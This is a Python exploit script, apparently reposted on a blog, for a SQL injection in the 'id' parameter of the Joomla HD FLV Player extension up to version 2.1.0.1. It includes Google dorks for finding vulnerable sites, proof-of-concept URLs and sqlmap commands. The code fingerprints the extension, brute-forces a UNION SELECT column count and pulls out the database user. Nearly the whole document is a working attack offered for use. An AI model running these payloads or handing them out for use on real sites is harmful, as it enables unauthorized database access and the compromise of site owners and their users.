#!/usr/bin/python## Exploit Title :  Joomla HD FLV 2.1.0.1 and below SQL Injection## Exploit Author : Claudio Viviani## Vendor Homepage : http://www.hdflvplayer.net/## Software Link : http://www.hdflvplayer.net/download_count.php?pid=5## Dork google 1:  inurl:/component/hdflvplayer/# Dork google 2:  inurl:com_hdflvplayer    ## Date : 2014-11-11## Tested on : BackBox 3.x/4.x## Info: The variable "id" is not sanitized (again)#       Over 80.000 downloads (statistic reported on official site)### Video Demo: http://youtu.be/-EdOQSjAhW8## Poc: #      http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]#      http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)## Poc sqlmap:#            sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql#            sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)## http connectionimport urllib, urllib2# string manipulationimport re# Errors managementimport sys# Args managementimport optparse
# Check urldef checkurl(url):    if url[:8] != "https://" and url[:7] != "http://":        print('[X] You must insert http:// or https:// procotol')        sys.exit(1)    else:        return url
banner = """        _______                      __           ___ ___ ______             |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \            |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \           |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \          |:  1   |                                 |:  |   |:  1    /          |::.. . |                                 |::.|:. |::.. . /           `-------'                                 `--- ---`------'             _______ ___     ___ ___     _______ __                               |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|         |:  |   |:  1   |:  1   |   |:  |            |_____|                  |::.|   |::.. . |\:.. ./    |::.|                                     `---'   `-------' `---'     `---'                                               <= 2.1.0.1 Sql Injection
                                Written by:
                              Claudio Viviani
                           http://www.homelab.it
                              info@homelab.it                          homelabit@protonmail.ch
                      https://www.facebook.com/homelabit                        https://twitter.com/homelabit                      https://plus.google.com/+HomelabIt1/             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww"""
commandList = optparse.OptionParser('usage: %prog -t URL')commandList.add_option('-t', '--target', action="store",                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",                  )
options, remainder = commandList.parse_args()
# Check argsif not options.target:    print(banner)    commandList.print_help()    sys.exit(1)
host = checkurl(options.target)
checkext = 0
evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }
char = "%2CNULL"endurl = "%2CNULL%23"bar = "#"
print(banner)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
try:   req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)   response = urllib2.urlopen(req).readlines()
   for line_version in response:
      if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:         checkext += 1      else:         checkext += 0
   if checkext > 0:         sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")   else:      sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")      sys.exit(1) 
except urllib2.HTTPError:   sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")   sys.exit(1)
except urllib2.URLError as e:   print("\n[X] Connection Error: "+str(e.code))   sys.exit(1)
print("")
sys.stdout.write("\r[+] Checking Version: ")
try:   req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)   response = urllib2.urlopen(req).readlines()  
   for line_version in response:
      if not line_version.find("<version>") == -1:
         VER = re.compile('>(.*?)<').search(line_version).group(1)
         sys.stdout.write("\r[+] Checking Version: "+str(VER))
except urllib2.HTTPError:   sys.stdout.write("\r[+] Checking Version: Unknown")
except urllib2.URLError as e:   print("\n[X] Connection Error: "+str(e.code))   sys.exit(1)
print("")
for exploiting, dork in evilurl.iteritems():
   s = ""   barcount = ""   for a in range(1,100):      
      s += char      try:         req = urllib2.Request(host+exploiting+s+endurl, None, headers)         response = urllib2.urlopen(req).read()
         if "h0m3l4b1t" in response:            print "\n[!] VULNERABLE"            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)            print "[*] Username: "+str(current_user)            print ""            print "[*] 3v1l Url: "+host+exploiting+s+endurl            sys.exit(0)
      except urllib2.HTTPError as e:         response = e.read()         if "h0m3l4b1t" in response:            print "\n[!] VULNERABLE"            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)            print "[*] Username: "+str(current_user)            print ""            print "[*] 3v1l Url: "+host+exploiting+s+endurl            sys.exit(0)
      except urllib2.URLError as e:         print("\n[X] Connection Error: "+str(e.code))         sys.exit(1)
      barcount += bar      sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)      sys.stdout.flush()
print "\n[X] Not vulnerable :("print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"

Đăng nhận xét Blogger

 
Top